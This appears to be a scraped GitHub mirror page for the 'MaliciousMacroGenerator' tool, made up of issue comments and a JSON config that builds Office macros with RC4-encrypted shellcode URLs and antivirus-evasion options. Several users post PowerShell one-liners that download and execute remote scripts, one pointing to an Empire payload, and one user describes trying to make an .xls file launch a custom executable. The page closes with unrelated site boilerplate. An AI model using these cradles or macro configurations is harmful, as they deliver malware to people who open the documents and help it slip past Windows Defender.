mr-un1k0d3r / maliciousmacrogenerator Goto Github PK
View Code? Open in Web Editor NEWMalicious Macro Generator
License: Other
Malicious Macro Generator
License: Other
windows defender is blocking
generic-cmd.json
generic-cmd2.json
wmi-cmd.json
in runtime, using powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https:/domain/file/the.ps1')""
also how do one make use of this
{
"description": "DotnettoJS with RC4 encrypted payload\nEvasion technique set to domain check",
"template": "templates/payloads/dotnettojs-evasion-template.vba",
"varcount": 150,
"encodingoffset": 4,
"chunksize": 200,
"encodedvars": {
"DOMAIN":"TEST",
"URL_X86":"https://RC4.encrypted.base64.shellcode.32.bit/?1=1",
"URL_X64":"https://RC4.encrypted.base64.shellcode.64.bit/?1=3",
"DECRYPTION_KEY":"RC4.base64.decryption.key",
"WAIT_TIME":"4294967295"
},
"vars": [],
"evasion": ["encoder", "domain"],
"payload": "cmd.exe /c calc.exe"
}
hello ,first thanks for this project, can you putt small demo please
when i try to generate the vbs file, this error happens
i already set my powershell payload in the json file, i try too put the exact location like this:
but still doesnt work
i use kali linux and python 2.7
in addition, in the image, i use vbs in the output. but i already try with vba and i have the same error
and my payload is
"payload": "powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://mydns/empire.ps1')""
please write how to use this python script.
i have tried with my custom exe. see images below:
step-1 edit wmi-cmd-evasion-process.json
http://solutionhunt.org/Capture1.JPG
step-2 copy wmi-cmd-evasion-process.json and r.exe files into MaliciousMacroGenerator directory.
http://solutionhunt.org/Capture2.JPG
step-3 execute python script.
http://solutionhunt.org/Capture3.JPG
what happend after this
so you can see its successfully generate vba file named with tryy2, but my r.exe was 960kb and generated tty2 vba is only 3.5 kb.
create .xls file with this vba, but when opening .xls file exe not executing.
why my r.exe not bind with vba?
what i am doing wrong?
please write a proper uses of your script, or give a demo.
regards
Demo!! please for the whole process
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.